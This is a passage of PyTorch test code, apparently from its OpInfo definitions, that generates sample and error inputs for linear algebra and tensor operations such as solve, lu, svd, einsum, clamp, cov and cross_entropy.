dtype, requires_grad=False, **kwargs): """ This function generates input for torch.linalg.eigh/eigvalsh with UPLO="U" or "L" keyword argument. """ def out_fn(output): if isinstance(output, tuple): # eigh function return output[0], abs(output[1]) else: # eigvalsh function return output # Samples do not need to be Hermitian, as we're using gradcheck_wrapper_hermitian_input samples = sample_inputs_linalg_invertible(op_info, device, dtype, requires_grad) for sample in samples: sample.kwargs = {"UPLO": np.random.choice(["L", "U"])} sample.output_process_fn_grad = out_fn yield sample def sample_inputs_linalg_slogdet(op_info, device, dtype, requires_grad=False, **kwargs): def out_fn(output): return output[1] samples = sample_inputs_linalg_invertible(op_info, device, dtype, requires_grad) for sample in samples: sample.output_process_fn_grad = out_fn yield sample def sample_inputs_linalg_pinv(op_info, device, dtype, requires_grad=False, **kwargs): """ This function generates input for torch.linalg.pinv with hermitian=False keyword argument. """ for o in sample_inputs_linalg_invertible(op_info, device, dtype, requires_grad, **kwargs): real_dtype = o.input.real.dtype if dtype.is_complex else dtype # requires_grad path for rtol tensor is not implemented for rtol in (None, 1.0, torch.tensor(1.0, dtype=real_dtype, device=device)): o = clone_sample(o) o.kwargs = {"rtol": rtol} yield o def sample_inputs_linalg_pinv_hermitian(op_info, device, dtype, requires_grad=False, **kwargs): """ This function generates input for torch.linalg.pinv with hermitian=True keyword argument. """ for o in sample_inputs_linalg_invertible(op_info, device, dtype, requires_grad, **kwargs): o.kwargs = {"hermitian": True} yield o def sample_inputs_linalg_solve(op_info, device, dtype, requires_grad=False, vector_rhs_allowed=True, **kwargs): """ This function generates always solvable input for torch.linalg.solve We sample a fullrank square matrix (i.e. invertible) A The first input to torch.linalg.solve is generated as the itertools.product of 'batches' and 'ns'. The second input is generated as the product of 'batches', 'ns' and 'nrhs'. In total this function generates 18 SampleInputs 'batches' cases include: () - single input, (0,) - zero batched dimension, (2,) - batch of two matrices. 'ns' gives 0x0 and 5x5 matrices. and 'nrhs' controls the number of vectors to solve for: () - using 1 as the number of vectors implicitly (1,) - same as () but explicit (3,) - solve for 3 vectors. Zeros in dimensions are edge cases in the implementation and important to test for in order to avoid unexpected crashes. 'vector_rhs_allowed' controls whether to include nrhs = () to the list of SampleInputs. torch.solve / triangular_solve / cholesky_solve (opposed to torch.linalg.solve) do not allow 1D tensors (vectors) as the right-hand-side. Once torch.solve / triangular_solve / cholesky_solve and its testing are removed, 'vector_rhs_allowed' may be removed here as well. """ make_fullrank = make_fullrank_matrices_with_distinct_singular_values make_a = partial(make_fullrank, dtype=dtype, device=device, requires_grad=requires_grad) make_b = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) batches = [(), (0, ), (2, )] ns = [5, 0] if vector_rhs_allowed: nrhs = [(), (1,), (3,)] else: nrhs = [(1,), (3,)] for n, batch, rhs in product(ns, batches, nrhs): yield SampleInput(make_a(*batch, n, n), args=(make_b((batch + (n,) + rhs)),)) def sample_inputs_linalg_solve_triangular(op_info, device, dtype, requires_grad=False, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device) bs = (1, 2, 0) ns = (3, 0) ks = (1, 3, 0) for b, n, k, (left, upper, uni) in product(bs, ns, ks, product((True, False), repeat=3)): if b == 1: A = make_arg((n, n)) if left else make_arg((k, k)) B = make_arg((n, k)) else: A = make_arg((b, n, n)) if left else make_arg((b, k, k)) B = make_arg((b, n, k)) if uni: # Not really necessary, but writing it for consistency A.diagonal(0, -2, -1).fill_(1.) else: d = A.diagonal(0, -2, -1) d[d.abs() < 1e-6] = 1. if upper: A.triu_() else: A.tril_() kwargs = {"upper": upper, "left": left, "unitriangular": uni} if requires_grad: for grad_A, grad_B in product((True, False), repeat=2): # Either A or B needs to have a gradient if not grad_A and not grad_B: continue yield SampleInput( A.clone().requires_grad_(grad_A), args=(B.clone().requires_grad_(grad_B),), kwargs=kwargs) else: yield SampleInput(A, args=(B,), kwargs=kwargs) def sample_inputs_legacy_solve(op_info, device, dtype, requires_grad=False, **kwargs): """ This function generates always solvable input for legacy solve functions (the ones that are not in torch.linalg module). The difference from sample_inputs_linalg_solve is that here the right-hand-side of A x = b equation should have b.ndim >= 2, vectors are not allowed. Also the arguments order is swapped. """ out = sample_inputs_linalg_solve( op_info, device, dtype, requires_grad=requires_grad, vector_rhs_allowed=False ) # Reverses tensor order for sample in out: sample.input, sample.args = sample.args[0], (sample.input,) yield sample def sample_inputs_cholesky_solve(op_info, device, dtype, requires_grad=False, **kwargs): cholesky_inverse_samples = sample_inputs_linalg_cholesky_inverse( op_info, device, dtype, requires_grad=False ) for sample in cholesky_inverse_samples: psd_matrix = sample.input sample.input = make_tensor(psd_matrix.shape, dtype=dtype, device=device, requires_grad=requires_grad, low=None, high=None) sample.args = (psd_matrix.requires_grad_(requires_grad),) yield sample def sample_inputs_lu(op_info, device, dtype, requires_grad=False, **kwargs): make_arg = partial(make_fullrank_matrices_with_distinct_singular_values, dtype=dtype, device=device, requires_grad=requires_grad) # not needed once OpInfo tests support Iterables batch_shapes = ((), (3,), (3, 3)) for batch_shape, get_infos, size_delta in product(batch_shapes, (True, False), (-2, -1, 0, +1, +2)): shape = batch_shape + (S + size_delta, S) input = make_arg(*shape) yield SampleInput(input, args=(True, get_infos)) def sample_inputs_linalg_lu(op_info, device, dtype, requires_grad=False, **kwargs): full_rank = (op_info.name == "linalg.lu_factor") make_fn = make_tensor if not full_rank else make_fullrank_matrices_with_distinct_singular_values make_arg = partial(make_fn, dtype=dtype, device=device, requires_grad=requires_grad) def out_fn(output): if op_info.name in ("linalg.lu"): return output[1], output[2] else: return output batch_shapes = ((), (3,), (3, 3)) # pivot=False only supported in CUDA pivots = (True, False) if torch.device(device).type == "cuda" else (True,) deltas = (-2, -1, 0, +1, +2) for batch_shape, pivot, delta in product(batch_shapes, pivots, deltas): shape = batch_shape + (S + delta, S) # Insanely annoying that make_fullrank_blablabla accepts a *shape and not a tuple! A = make_arg(shape) if not full_rank else make_arg(*shape) yield SampleInput(A, kwargs={"pivot": pivot}, output_process_fn_grad=out_fn) def sample_inputs_lu_solve(op_info, device, dtype, requires_grad=False, **kwargs): make_fn = make_fullrank_matrices_with_distinct_singular_values make_a = partial(make_fn, dtype=dtype, device=device) make_b = partial(make_tensor, dtype=dtype, device=device) batches = ((), (0, ), (2, )) ns = (5, 3, 0) nrhs = (0, 1, 6) for n, batch, rhs in product(ns, batches, nrhs): shape_a = batch + (n, n) a = make_a(*shape_a) lu, pivs = a.lu() lu = lu.contiguous() shape_b = batch + (n, rhs) b = make_b(shape_b) grads = (False,) if not requires_grad else (True, False) # we try all possible combinations of requires_grad for each input for lu_grad, b_grad in product(grads, grads): # when requires_grad == True, at least one input has to have requires_grad enabled if requires_grad and not lu_grad and not b_grad: continue lu_ = lu.clone() lu_.requires_grad_(lu_grad) b_ = b.clone() b_.requires_grad_(b_grad) yield SampleInput(b_, args=(lu_, pivs)) def sample_inputs_lu_unpack(op_info, device, dtype, requires_grad=False, **kwargs): def out_fn(output): return output[1], output[2] for lu_sample in sample_inputs_linalg_lu(op_info, device, dtype, requires_grad, **kwargs): lu_data, pivots = torch.linalg.lu_factor(lu_sample.input) lu_data.requires_grad_(requires_grad) yield SampleInput(lu_data, args=(pivots,), output_process_fn_grad=out_fn) def sample_inputs_roll(op_info, device, dtype, requires_grad=False, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) args = ((0, 0), (1, 2), (0, 2), (2, 0), (-1, 0), (10000, 1), (2,), ((1, 2, -1), (0, 1, 2))) for arg in args: yield SampleInput(make_arg((0, 0, 0)), args=arg) yield SampleInput(make_arg((S, S, S)), args=arg) def error_inputs_roll(op_info, device, **kwargs): err_msg1 = "`shifts` required" s1 = SampleInput( make_tensor((S,), dtype=torch.float32, device=device), args=(tuple(),) ) yield ErrorInput(s1, error_regex=err_msg1) err_msg2 = ("shifts and dimensions must align") s2 = SampleInput( make_tensor((S, S), dtype=torch.float32, device=device), args=((2, 1), 0) ) yield ErrorInput(s2, error_regex=err_msg2) err_msg3 = ("out of range") s3 = SampleInput( make_tensor((S, ), dtype=torch.float32, device=device), args=(0, 2) ) yield ErrorInput(s3, error_regex=err_msg3, error_type=IndexError) def sample_inputs_rot90(op_info, device, dtype, requires_grad=False, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) args = itertools.product(range(-5, 6), [(0, 1), (1, 2), (1, -1)]) yield SampleInput(make_arg((S, S, S))) for arg in args: yield SampleInput(make_arg((S, S, S)), args=arg) def error_inputs_rot90(op_info, device, **kwargs): err_msg1 = "expected total rotation dims" s1 = SampleInput( make_tensor((S, S), dtype=torch.float32, device=device), kwargs={"dims": (0,)} ) yield ErrorInput(s1, error_regex=err_msg1) err_msg2 = "expected total dims >= 2" s2 = SampleInput( make_tensor((S,), dtype=torch.float32, device=device), ) yield ErrorInput(s2, error_regex=err_msg2) err_msg3 = "expected rotation dims to be different" s3 = SampleInput( make_tensor((S, S), dtype=torch.float32, device=device), kwargs={"dims": (1, 1)} ) yield ErrorInput(s3, error_regex=err_msg3) def sample_inputs_std_var(op_info, device, dtype, requires_grad, **kwargs): tensor_nd = partial(make_tensor, (S, S, S), device=device, dtype=dtype, requires_grad=requires_grad) tensor_1d = partial(make_tensor, (S,), device=device, dtype=dtype, requires_grad=requires_grad) return [ SampleInput(tensor_nd()), SampleInput(tensor_nd(), kwargs=dict(dim=1)), SampleInput(tensor_nd(), kwargs=dict(dim=1, unbiased=True, keepdim=True)), SampleInput(tensor_1d(), kwargs=dict(dim=0, unbiased=True, keepdim=True)), SampleInput(tensor_1d(), kwargs=dict(dim=0, unbiased=False, keepdim=False)), SampleInput(tensor_nd(), kwargs=dict(dim=(1,), correction=S // 2)), SampleInput(tensor_nd(), kwargs=dict(dim=None, correction=0, keepdim=True)), ] def _generate_correlation_inputs(device, dtype, requires_grad, **kwargs): shapes = [(2,), (1, 2), (3, 2), (2, 3)] for shape in shapes: yield make_tensor(shape, dtype=dtype, device=device, requires_grad=requires_grad) def sample_inputs_corrcoef(op_info, device, dtype, requires_grad, **kwargs): return [SampleInput(t) for t in _generate_correlation_inputs(device, dtype, requires_grad)] def sample_inputs_cov(op_info, device, dtype, requires_grad, **kwargs): inputs = [] for t in _generate_correlation_inputs(device, dtype, requires_grad): inputs.append(SampleInput(t)) num_observations = t.numel() if t.ndimension() < 2 else t.size(1) fweights = make_tensor((num_observations,), dtype=torch.int, device=device, low=1, high=10) aweights = make_tensor((num_observations,), dtype=torch.float, device=device, low=0, high=1, requires_grad=requires_grad) for correction, fw, aw in product(range(num_observations), [None, fweights], [None, aweights]): inputs.append(SampleInput(t.clone().requires_grad_(requires_grad), kwargs={'correction': correction, 'fweights': fw, 'aweights': aw})) return inputs def error_inputs_cov(op_info, device, **kwargs): a = torch.rand(S, device=device) error_inputs = [] error_inputs.append(ErrorInput( SampleInput(torch.rand(S, S, S, device=device)), error_regex="expected input to have two or fewer dimensions")) error_inputs.append(ErrorInput( SampleInput(a, kwargs={'fweights': torch.rand(S, S, device=device)}), error_regex="expected fweights to have one or fewer dimensions")) error_inputs.append(ErrorInput( SampleInput(a, kwargs={'aweights': torch.rand(S, S, device=device)}), error_regex="expected aweights to have one or fewer dimensions")) error_inputs.append(ErrorInput( SampleInput(a, kwargs={'fweights': torch.rand(S, device=device)}), error_regex="expected fweights to have integral dtype")) error_inputs.append(ErrorInput( SampleInput(a, kwargs={'aweights': torch.tensor([1, 1], device=device)}), error_regex="expected aweights to have floating point dtype")) error_inputs.append(ErrorInput( SampleInput(a, kwargs={'fweights': torch.tensor([1], device=device)}), error_regex="expected fweights to have the same numel")) error_inputs.append(ErrorInput( SampleInput(a, kwargs={'aweights': torch.rand(1, device=device)}), error_regex="expected aweights to have the same numel")) error_inputs.append(ErrorInput( SampleInput(a, kwargs={'fweights': torch.tensor([-1, -2, -3, -4 , -5], device=device)}), error_regex="fweights cannot be negative")) error_inputs.append(ErrorInput( SampleInput(a, kwargs={'aweights': torch.tensor([-1., -2., -3., -4., -5.], device=device)}), error_regex="aweights cannot be negative")) return error_inputs def sample_inputs_svd(op_info, device, dtype, requires_grad=False, **kwargs): make_fullrank = make_fullrank_matrices_with_distinct_singular_values make_arg = partial(make_fullrank, dtype=dtype, device=device, requires_grad=requires_grad) is_linalg_svd = (op_info.name == "linalg.svd") batches = [(), (0, ), (3, )] ns = [0, 3, 5] def uniformize(usv): S = usv[1] k = S.shape[-1] U = usv[0][..., :k] Vh = usv[2] if is_linalg_svd else usv[2].mH Vh = Vh[..., :k, :] return U, S, Vh def fn_U(usv): U, _, _ = uniformize(usv) return U.abs() def fn_S(usv): return uniformize(usv)[1] def fn_Vh(usv): # We also return S to test _, S, Vh = uniformize(usv) return S, Vh.abs() def fn_UVh(usv): U, S, Vh = uniformize(usv) return U @ Vh, S fns = (fn_U, fn_S, fn_Vh, fn_UVh) fullmat = 'full_matrices' if is_linalg_svd else 'some' for batch, n, k, fullmat_val, fn in product(batches, ns, ns, (True, False), fns): shape = batch + (n, k) yield SampleInput(make_arg(*shape), kwargs={fullmat: fullmat_val}, output_process_fn_grad=fn) def sample_inputs_permute(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) cases = [((1, 2, 3, 4), (0, 2, 3, 1)), ((1, 2, 3, 4), (0, -2, -1, 1)), ((), ()), ((1, 2, 3, 4), (2, 1, 3, 0))] for shape, args in cases: yield SampleInput(make_arg(shape), args=(args,)) def reference_inputs_permute(op, device, dtype, requires_grad, **kwargs): yield from sample_inputs_permute(op, device, dtype, requires_grad, **kwargs) make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) cases = ( ((), ()), ((1,), (0,)), ((2, 2), (1, 0)), ((2, 2), (0, 1)), ((2, 0, 1), (0, 2, 1)), ((3, 4, 2), (2, 1, 0)), ((3, 4, 2), (1, 0, 2)), ((3, 4, 2), (0, 1, 2)), ) # Adds tricky permutations and permutations with noncontiguity for shape, permutation in cases: for p in itertools.permutations(permutation): a = make_arg(shape).permute(p) yield SampleInput(a, args=(permutation,)) a = make_arg(shape, noncontiguous=True).permute(p) yield SampleInput(a, args=(permutation,)) def sample_inputs_linalg_svdvals(op_info, device, dtype, requires_grad=False, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) batches = [(), (0, ), (2, ), (1, 1)] ns = [5, 2, 0] for batch, m, n in product(batches, ns, ns): yield SampleInput(make_arg(batch + (m, n))) def sample_inputs_softshrink_hardshrink_hardtanh(op_info, device, dtype, requires_grad=False, **kwargs): N = 10 tensors = [SampleInput(make_tensor((N, N), device=device, dtype=dtype, requires_grad=requires_grad)) for _ in range(1, N)] return tensors def sample_inputs_eig(op_info, device, dtype, requires_grad=False, **kwargs): eigvecs = make_tensor((S, S), device=device, dtype=dtype, low=None, high=None) eigvals = make_tensor((S,), device=device, dtype=dtype, low=None, high=None) # we produce only diagonazible inputs which do not have # complex eigenvalues for real inputs, as there is no # backward implementation for real inputs with complex # eigenvalues yet. input = (eigvecs * eigvals.unsqueeze(-2)) @ eigvecs.inverse() input.requires_grad_(requires_grad) def process_output(eigpair): eigvals, eigvecs = eigpair if dtype.is_complex: # eig produces eigenvectors which are normalized to 1 norm. # Note that if v is an eigenvector, so is v * e^{i \phi}, # and |v| = |v * e^{i \phi}| = 1. # This, however, makes the eigenvector backward computation process # rather unstable unless the objective function is gauge-invariant, # that is if f(z) == f(|z|), for example. # Hence for complex inputs we ignore the phases and return only # the absolute values. return eigvals, eigvecs.abs() else: return eigvals, eigvecs return [ SampleInput( input, kwargs=dict(eigenvectors=True), output_process_fn_grad=process_output ), ] def sample_inputs_einsum(op_info, device, dtype, requires_grad=False, **kwargs): def c(t): return t.clone().requires_grad_(requires_grad) x = make_tensor((3,), dtype=dtype, device=device, requires_grad=requires_grad) y = make_tensor((4,), dtype=dtype, device=device, requires_grad=requires_grad) A = make_tensor((2, 3,), dtype=dtype, device=device, requires_grad=requires_grad) B = make_tensor((1, 3,), dtype=dtype, device=device, requires_grad=requires_grad) C = make_tensor((1, 2, 3,), dtype=dtype, device=device, requires_grad=requires_grad) D = make_tensor((1, 3, 4,), dtype=dtype, device=device, requires_grad=requires_grad) E = make_tensor((4, 4,), dtype=dtype, device=device, requires_grad=requires_grad) H = make_tensor((3, 3,), dtype=dtype, device=device, requires_grad=requires_grad) I = make_tensor((1, 3, 1,), dtype=dtype, device=device, requires_grad=requires_grad) inputs = [] # Vector operations inputs.append(SampleInput([c(x)], args=('i->',))) # sum inputs.append(SampleInput([c(x), c(y)], args=('i,j->ij',))) # outer # Matrix operations inputs.append(SampleInput([c(A)], args=("ij->i",))) # col sum inputs.append(SampleInput([c(A), c(B)], args=("ij,kj->ik",))) # matmul inputs.append(SampleInput([c(A), c(E)], args=("ij,Ab->ijAb",))) # matrix outer product # Tensor operations inputs.append(SampleInput([c(C), c(D)], args=("aij,ajk->aik",))) # batch matmul inputs.append(SampleInput([c(D), c(E)], args=("aij,jk->aik",))) # tensor matrix contraction inputs.append(SampleInput([c(C), c(B)], args=("ijk,ik->j",))) # non contiguous # Test diagonals inputs.append(SampleInput([c(I)], args=('iji->j',))) # non-contiguous trace # Test ellipsis inputs.append(SampleInput([c(H)], args=("i...->...",))) inputs.append(SampleInput([c(C), c(x)], args=('...ik, ...j -> ij',))) return inputs def sample_inputs_linalg_qr_geqrf(op_info, device, dtype, requires_grad=False, **kwargs): # QR is just well defined when the matrix is full rank make_fullrank = make_fullrank_matrices_with_distinct_singular_values make_arg = partial(make_fullrank, dtype=dtype, device=device, requires_grad=requires_grad) batches = [(), (0,), (2, ), (1, 1)] ns = [5, 2, 0] for batch, (m, n) in product(batches, product(ns, ns)): shape = batch + (m, n) yield SampleInput(make_arg(*shape)) def sample_inputs_flip(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) sizes = ((S, M, S), (S, 0, M)) all_dims = ((0, 1, 2), (0,), (0, 2), (-1,), ()) for size, dims in product(sizes, all_dims): yield SampleInput(make_arg(size), kwargs={"dims": dims}) def sample_inputs_fliplr_flipud(op_info, device, dtype, requires_grad, **kwargs): tensors = ( make_tensor((S, M, S), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), make_tensor((S, 0, M), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad) ) return [SampleInput(tensor) for tensor in tensors] def error_inputs_fliplr(op, device, **kwargs): yield ErrorInput(SampleInput(make_tensor((1,), dtype=torch.float, device=device)), error_regex="Input must be >= 2-d.") def error_inputs_flipud(op, device, **kwargs): yield ErrorInput(SampleInput(make_tensor((), dtype=torch.float, device=device)), error_regex="Input must be >= 1-d.") # TODO: clamp shares tensors among its sample inputs --- we should prohibit this! def sample_inputs_clamp(op_info, device, dtype, requires_grad, **kwargs): x = make_tensor((S, M, S), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad) lb = make_tensor((S, M, S), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad) ub = make_tensor((S, M, S), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad) def detach(tensor): return tensor.clone().detach_().requires_grad_(requires_grad) return [ SampleInput(detach(x), args=(lb, ub)), SampleInput(detach(x), args=(detach(lb[0]), detach(ub[0]))), SampleInput(detach(x), args=(detach(lb[:, :1]),)), ] def reference_inputs_elementwise_ternary(op, device, dtype, requires_grad, *, sample_inputs_func, supports_scalars=False, **kwargs): yield from sample_inputs_func(op, device, dtype, requires_grad, **kwargs) make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) make_scalar_tensor = partial(make_tensor, (), device='cpu', dtype=dtype, requires_grad=requires_grad) supported_dtypes = op.supported_dtypes(device) # broadcasting and oncontiguous cases cases = ( ((4, 4), (4, 4), (4, 4)), ((4, 4), (1, 4, 4), (4, 4)), ((4, 4), (1, 4, 4), (4, 1, 4)), ((4, 4, 1), (1, 4, 4), (4, 4)), ((4, 1), (1, 4, 4), (1, 4)), ((4, 4), (), (4, 4)), ((4, 4), (), ()), ((), (4, 4), (1, 4, 4)), ) for a, b, c in cases: yield SampleInput(make_arg(a), args=(make_arg(b), make_arg(c))) yield SampleInput(make_arg(a, noncontiguous=True), args=(make_arg(b).transpose(0, -1), make_arg(c, noncontiguous=True).transpose(0, -1))) # scalar cases if supports_scalars: cases = [ ((), 1, 2,), ((), 1., 2), ((4, 4), 1., 2,), ((3, 4), make_scalar_tensor(), make_scalar_tensor()), ] if torch.complex64 in supported_dtypes: cases.extend([ ((3, 1, 4), complex(1, 2), 3.), ]) for a, b, c in cases: yield SampleInput(make_arg(a), args=(b, c)) # type promotion cases # int x float if torch.float in supported_dtypes and torch.long in supported_dtypes: a = make_arg((), dtype=torch.long) b = make_arg((1, 4), dtype=torch.float) c = make_arg((3, 4)) cases = ( (a, b, c), (c, a, b), ) for a, b, c in cases: yield SampleInput(a, args=(b, c)) # NaN propagation if dtype.is_floating_point or dtype.is_complex: nan = float('nan') if dtype.is_floating_point else complex(float('nan'), float('nan')) a = make_arg((12,)) a[4] = nan a[7] = nan b = make_arg((12,)) b[1] = nan b[7] = nan c = make_arg((12,)) c[9] = nan yield SampleInput(a, args=(b, c)) def _clamp_numpy(a, min=None, max=None): if min is None: return np.minimum(a, max) if max is None: return np.maximum(a, min) return np.minimum(max, np.maximum(a, min)) def sample_inputs_clamp_scalar(op_info, device, dtype, requires_grad, **kwargs): tensors = ( make_tensor((2, 3, 2), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), make_tensor((2, 0, 3), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), ) if dtype is torch.uint8: min_max_vals = ((2, 5), (3, 7)) else: min_max_vals = ((0, 1), (-1, 1)) output = [SampleInput( tensor.clone().requires_grad_(requires_grad), args=vals) for tensor, vals in product(tensors, min_max_vals)] output += [ SampleInput(tensors[0].clone().requires_grad_(requires_grad), args=(0.5, None)), SampleInput(tensors[0].clone().requires_grad_(requires_grad), args=(None, 0.5))] empty_tensor = make_tensor((), device=device, dtype=dtype, low=None, high=None, requires_grad=requires_grad) output.append(SampleInput(empty_tensor, args=(0.0, 1.0))) return output def sample_kwargs_clamp_scalar(device, dtype, input): if dtype is torch.uint8: min_val, max_val = (random.randint(1, 3), random.randint(4, 8)) elif dtype.is_floating_point: min_val, max_val = (random.uniform(-8, 0), random.uniform(1, 8)) # type: ignore[assignment] else: min_val, max_val = (random.randint(-8, 0), random.randint(1, 8)) return {'min': min_val, 'max': max_val}, {'a_min': min_val, 'a_max': max_val} def sample_inputs_cross(op_info, device, dtype, requires_grad, **kwargs): sample0 = SampleInput(make_tensor((S, 3), device=device, dtype=dtype, requires_grad=requires_grad), args=(make_tensor((S, 3), device=device, dtype=dtype, requires_grad=requires_grad),)) sample1 = SampleInput(make_tensor((S, 3, S), device=device, dtype=dtype, requires_grad=requires_grad), args=(make_tensor((S, 3, S), device=device, dtype=dtype, requires_grad=requires_grad),), kwargs={'dim': 1}) sample2 = SampleInput(make_tensor((S, 3), device=device, dtype=dtype, requires_grad=requires_grad), args=(make_tensor((S, 3), device=device, dtype=dtype, requires_grad=requires_grad),), kwargs={'dim': -1}) return (sample0, sample1, sample2) def sample_inputs_cumprod(op_info, device, dtype, requires_grad, **kwargs): def make_arg(shape): # shrink values to be in the interval [-1, +1] for better precision in gradgradcheck return make_tensor(shape, dtype=dtype, device=device, low=-1, high=+1, requires_grad=requires_grad) def prod_zeros(dim_select): assert len(dim_select) == 2 result = make_arg(3 * (S,)) result.narrow(dim_select[0], 0, 1).narrow(dim_select[1], 1, 1).zero_() result.narrow(dim_select[0], 2, 1).narrow(dim_select[1], 3, 1).zero_() result.narrow(dim_select[0], 4, 1).narrow(dim_select[1], 3, 1).zero_() return result for dim in range(3): yield SampleInput(make_arg((S, S, S)), args=(dim,)) # Scalar tensors and empty tensor for size in [(), (1,), (0,)]: yield SampleInput(make_arg(size), args=(0,)) yield SampleInput(prod_zeros([0, 1]), args=(1,)) yield SampleInput(prod_zeros([0, 2]), args=(1,)) yield SampleInput(prod_zeros([1, 2]), args=(1,)) # test dtype kwarg yield SampleInput(prod_zeros([1, 2]), args=(1,), kwargs={'dtype': dtype}) def sample_inputs_view_as_complex(op_info, device, dtype, requires_grad, **kwargs): return [SampleInput(make_tensor((S, 2), dtype=dtype, device=device, requires_grad=requires_grad),)] def sample_inputs_view_as_real(op_info, device, dtype, requires_grad, **kwargs): tensors = ( make_tensor((S, S), dtype=dtype, device=device, requires_grad=requires_grad), make_tensor((), dtype=dtype, device=device, requires_grad=requires_grad) ) return [SampleInput(tensor) for tensor in tensors] def sample_inputs_prod(op_info, device, dtype, requires_grad, **kwargs): def make_arg(shape): # shrink values to be in the interval [-1, +1] for better precision in gradgradcheck return make_tensor(shape, dtype=dtype, device=device, low=-1, high=+1, requires_grad=requires_grad) def prod_single_zero(): result = make_arg(2 * (S,)) result[0, 1] = 0 return result for sample in sample_inputs_cumprod(op_info, device, dtype, requires_grad): # only Tensor, ignore other inputs yield SampleInput(sample.input.clone().requires_grad_(requires_grad)) yield sample # Generates samples with keepdim = True for sample in sample_inputs_cumprod(op_info, device, dtype, requires_grad): sample.kwargs['keepdim'] = True yield sample yield SampleInput(prod_single_zero()) yield SampleInput(make_arg((3, 3, 3)), args=(1,)) yield SampleInput(make_arg((3, 3, 3)), args=(1,), kwargs={'keepdim': True}) # test zero scalar tensor zero = make_arg(()) zero.zero_() yield SampleInput(zero.clone().requires_grad_(requires_grad)) yield SampleInput(zero.clone().requires_grad_(requires_grad), args=(0,)) yield SampleInput(zero.clone().requires_grad_(requires_grad), args=(0,), kwargs={'keepdim': True}) def error_inputs_neg(op_info, device, **kwargs): si = SampleInput(torch.tensor((False, True), device=device)) msg = ("Negation, the `\\-` operator, on a bool tensor is not supported." " If you are trying to invert a mask, use the `\\~` or" " `logical_not\\(\\)` operator instead.") return (ErrorInput(si, error_regex=msg),) def sample_inputs_diag(op_info, device, dtype, requires_grad, **kwargs): vec_sample = SampleInput(make_tensor((M, ), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad)) tensors = ( make_tensor((M, M), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), make_tensor((3, 5), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), make_tensor((5, 3), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), ) args = ((), (2,), (-2,), (1,), (2,)) samples = [] for tensor, arg in product(tensors, args): samples.append(SampleInput(tensor.clone().requires_grad_(requires_grad), args=arg)) return samples + [vec_sample] def sample_inputs_diagonal_diag_embed(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) # Shapes for 2D Tensors shapes_2d = ((M, M), (3, 5), (5, 3)) # Shapes for 3D Tensors shapes_3d = ((M, M, M),) kwargs_2d = (dict(), dict(offset=2), dict(offset=2), dict(offset=1)) kwargs_3d = (dict(offset=1, dim1=1, dim2=2), dict(offset=2, dim1=0, dim2=1), dict(offset=-2, dim1=0, dim2=1)) for shape, kwarg in chain(product(shapes_2d, kwargs_2d), product(shapes_3d, kwargs_3d)): yield SampleInput(make_arg(shape), kwargs=kwarg) def sample_inputs_diagonal_scatter(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) # Shapes for 2D Tensors shapes_2d = ((M, M), (3, 5), (5, 3)) # Shapes for 3D Tensors shapes_3d = ((M, M, M),) args_2d = ((), (2,), (-2,), (1,)) args_3d = ((1, 1, 2), (2, 0, 1), (-2, 0, 1)) for input_shape, arg in chain(product(shapes_2d, args_2d), product(shapes_3d, args_3d)): input_ = make_arg(input_shape) # We can programatically figure out the right shape for src: # It should be the same size as input.diagonal(other_args...) if not isinstance(arg, tuple): arg_tuple = (arg,) else: arg_tuple = arg src_shape = input_.diagonal(*arg_tuple).size() src = make_arg(src_shape) yield SampleInput(input_, args=(src, *arg_tuple)) def sample_inputs_to_sparse(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) return (SampleInput(make_arg((S, S)), args=(), output_process_fn_grad=lambda x: x.to_dense()), SampleInput(make_arg((S, S)), args=(1,), output_process_fn_grad=lambda x: x.to_dense()),) def sample_inputs_cross_entropy(op_info, device, dtype, requires_grad, **kwargs): batch_size, num_classes = shape = (2, 3) reductions = ("mean", "sum", "none") input_shape_and_kwargs: List[Tuple[Tuple[int, ...], Dict[str, Any]]] = [ (shape, dict()), ((*shape, 1), dict()), ((*shape, 1, 2), dict()), ((*shape, 1, 2, 3), dict()), *[(shape, dict(reduction=reduction)) for reduction in reductions], *[ ( shape, dict( weight=make_tensor((num_classes,), device=device, dtype=dtype), reduction=reduction, ), ) for reduction in reductions ], (shape, dict(ignore_index=1)), ] sample_inputs = [] for (input_shape, kwargs), probabilities_target in itertools.product(input_shape_and_kwargs, (False, True)): input = make_tensor(input_shape, device=device, dtype=dtype, requires_grad=requires_grad) if probabilities_target: # ignore_index is not supported for probabilities target if "ignore_index" in kwargs: continue target = make_tensor( input_shape, low=0, high=1, device=device, dtype=dtype, requires_grad=requires_grad, ) else: target = make_tensor( (batch_size, *input_shape[2:]), low=0, high=num_classes, device=device, dtype=torch.long, ) if "ignore_index" in kwargs and torch.all(target == kwargs["ignore_index"]): # make sure at least one item in target is not ignored target[0] = random.sample(set(range(num_classes)) - {kwargs["ignore_index"]}, 1)[0] sample_inputs.append(SampleInput(input, args=(target,), kwargs=kwargs)) return sample_inputs # Used for log_softmax, softmax, softmin def sample_inputs_softmax_variant(op_info, device, dtype, requires_grad, 